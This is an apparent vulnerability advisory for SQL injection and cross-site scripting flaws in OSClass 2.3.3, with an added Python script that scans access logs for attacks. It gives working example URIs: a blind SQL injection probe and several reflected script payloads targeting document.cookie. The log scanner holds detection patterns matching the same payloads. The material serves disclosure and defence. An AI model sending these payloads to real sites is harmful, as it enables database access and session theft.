OSClass SQL Injection and Cross Site Scripting Vulnerabilities
BID:51662
Info
| Bugtraq ID: | 51662 |
| Class: | Input Validation Error |
| CVE: | CVE-2012-0973, CVE-2012-0974 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 25 2012 12:00AM |
| Updated: | Mar 19 2015 07:35AM |
| Credit: | High-Tech Bridge SA Security Research Lab |
| Vulnerable: | OSclass osclass 2.3.3 |
| Not Vulnerable: | OSclass osclass 2.3.5 |
Discussion
OSClass is prone to SQL-injection and cross-site scripting vulnerabilities.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OSClass 2.3.3 is vulnerable; other versions may also be affected.
Exploit / POC
Attackers can use a browser to exploit the SQL-injection issue. The attacker must trick an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issue.
The following example URIs are available:
http://www.example.com/index.php?page=search&sCategory[]=0%27%20OR%20%28SELECT%20MID%28version%28%29,1,1%29%29=5%29%20d%20--%202
http://www.example.com/index.php?page=search&sCity=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?page=search&sPattern=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?page=search&sPriceMax=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?page=search&sPriceMin=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
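For defenders reviewing logs from an affected 2.3.3 install, the following added example (not part of the original advisory and not OSClass code) scans access-log lines for requests to the search page whose parameters, as named in the example URIs above, carry SQL or script markup. The combined log format, the regex signatures and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Search parameters named in the advisory's example URIs.
WATCHED = {"sCategory[]", "sCity", "sPattern", "sPriceMax", "sPriceMin"}

# Heuristic signatures (assumptions; tune against your own traffic).
SIGNATURES = {
    "sqli": re.compile(r"'\s*(or|and|union)\b|\bselect\b[^)]*\(|--\s", re.I),
    "xss": re.compile(r"<\s*/?\s*(script|title)\b|[\"']\s*>", re.I),
}

# Request field of a combined-format access-log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; the first two reuse payloads from the example URIs.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Jan/2012:10:00:01 +0000] "GET /index.php?page=search&sCategory[]=0%27%20OR%20%28SELECT%20MID%28version%28%29,1,1%29%29=5%29%20d%20--%202 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [25/Jan/2012:10:00:07 +0000] "GET /index.php?page=search&sCity=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E HTTP/1.1" 200 4988',
    '192.0.2.12 - - [25/Jan/2012:10:00:09 +0000] "GET /index.php?page=search&sCity=Barcelona&sPattern=mountain+bike&sPriceMin=50&sPriceMax=200 HTTP/1.1" 200 6012',
]


def scan_line(line):
    """Return sorted (parameter, kind) findings for one access-log line."""
    match = REQUEST.search(line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    # parse_qsl percent-decodes both names and values, so encoded
    # payloads are matched in their decoded form.
    pairs = parse_qsl(query, keep_blank_values=True)
    if ("page", "search") not in pairs:
        return []
    findings = set()
    for name, value in pairs:
        if name in WATCHED:
            for kind, pattern in SIGNATURES.items():
                if pattern.search(value):
                    findings.add((name, kind))
    return sorted(findings)


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(scan_line(entry) or "clean", "<-", entry.split('"')[1])
```

Hits on these parameters are a triage signal only; the fix for the underlying issues is the upgrade to 2.3.5 listed as not vulnerable.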
Solution / Fix
Solution:
Updates are available. Please see the references for more information.
References
References:
- OSClass 2.3.5 (OSclass)
- OSclass Homepage (OSclass)
- Multiple vulnerabilities in OSclass (High-Tech Bridge SA Security Research Lab)